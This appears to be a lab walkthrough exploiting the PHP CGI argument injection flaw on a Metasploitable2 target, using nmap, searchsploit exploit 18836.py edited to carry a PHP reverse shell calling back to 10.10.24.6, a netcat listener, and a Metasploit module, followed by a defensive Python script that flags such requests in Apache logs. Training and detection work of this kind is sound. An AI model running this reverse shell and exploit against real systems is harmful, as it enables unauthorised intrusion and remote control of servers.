PHP < 5.3.12 / < 5.4.2 - CGI Argument Injection
nmap -sV -sC -p 80 10.2.20.205
80/tcp open http Apache httpd 2.2.8 ((Ubuntu) DAV/2)
|_http-title: Metasploitable2 - Linux
|_http-server-header: Apache/2.2.8 (Ubuntu) DAV/2
Browse to the phpinfo page to confirm the PHP build:
http://10.2.20.205/phpinfo.php
PHP Version 5.2.4-2ubuntu5.10
# 5.2.4 is older than the 5.3.12 / 5.4.2 fixes, so the target is in scope

Manual/Script Exploitation
Find an exploit with searchsploit:
searchsploit php cgi
PHP < 5.3.12 / < 5.4.2 - CGI Argument Injection | php/remote/18836.py
# Copy the exploit into the current directory
searchsploit -m 18836
# Dry run with the default payload to confirm the exploit works against the target
python2 18836.py 10.2.20.205 80

Edit the pwn_code variable in 18836.py and replace it with PHP reverse shell code:
vim 18836.py
# insert:
pwn_code = """<?php $sock=fsockopen("10.10.24.6",1234);exec("/bin/sh -i <&4 >&4 2>&4");?>"""
# Save and quit
# In another terminal, start a listener on the port used in pwn_code
nc -nvlp 1234
# Launch the exploit
python2 18836.py 10.2.20.205 80
The shell comes back as the unprivileged "www-data" user.

Automatic MSF
The Metasploit module exploit/multi/http/php_cgi_arg_injection can be used too.
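From the defender's side the same flaw is easy to spot in Apache access logs: a query string with no literal "=" is handed to php-cgi as command-line arguments, which is why exploit traffic encodes "=" as %3d and separates arguments with "+". The following is an added example (not from the page or from 18836.py) that flags such requests in combined-format log lines; the log lines and the 198.51.100.7 address are constructed.

```python
import re
from urllib.parse import unquote_plus

# Apache "combined" access log format; enough to pull out client, method, target, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)

# php-cgi command-line switches a query string can smuggle onto argv
# (-d sets an ini directive, -s dumps highlighted source, -n skips php.ini,
# -c points at an alternate php.ini directory).
CGI_SWITCHES = ("-d", "-s", "-n", "-c")


def is_cgi_arg_injection(target: str) -> bool:
    """True if the request target would reach php-cgi as command-line arguments."""
    if "?" not in target:
        return False
    query = target.split("?", 1)[1]
    # RFC 3875 / mod_cgi: only a query string with NO literal '=' is passed as argv.
    if "=" in query:
        return False
    tokens = unquote_plus(query).split()
    return any(tok.startswith(CGI_SWITCHES) for tok in tokens)


def scan_log(lines):
    """Return (client_ip, method, decoded_query) for each suspicious request."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if m and is_cgi_arg_injection(m["target"]):
            decoded = unquote_plus(m["target"].split("?", 1)[1])
            hits.append((m["ip"], m["method"], decoded))
    return hits


# Constructed sample log lines (not from the page); 198.51.100.7 plays the attacker.
SAMPLE_LOG = """\
198.51.100.7 - - [10/Jan/2024:10:00:01 +0000] "POST /?-d+allow_url_include%3don+-n HTTP/1.1" 200 512 "-" "python-requests/2.0"
198.51.100.7 - - [10/Jan/2024:10:00:05 +0000] "GET /index.php?-s HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
192.0.2.10 - - [10/Jan/2024:10:01:00 +0000] "GET /index.php?page=home HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
192.0.2.11 - - [10/Jan/2024:10:01:30 +0000] "GET /search?q=-d+tuning HTTP/1.1" 200 300 "-" "Mozilla/5.0"
"""

if __name__ == "__main__":
    for ip, method, query in scan_log(SAMPLE_LOG.splitlines()):
        print(f"{ip} {method} argv-style query: {query!r}")
```

The fourth sample line is deliberately not flagged: its "=" keeps the query out of argv, so a naive grep for "-d" would produce a false positive where mod_cgi never passes anything to php-cgi. A hit against a host still running the 5.2.x build seen above is a cue to upgrade to 5.3.12 / 5.4.2 or later rather than to keep writing rules.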
